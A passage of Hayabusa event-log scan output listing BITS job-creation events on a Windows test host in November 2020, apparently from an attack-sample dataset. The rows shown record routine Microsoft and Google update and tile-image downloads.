Control/bits_openvpn.evtx -2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 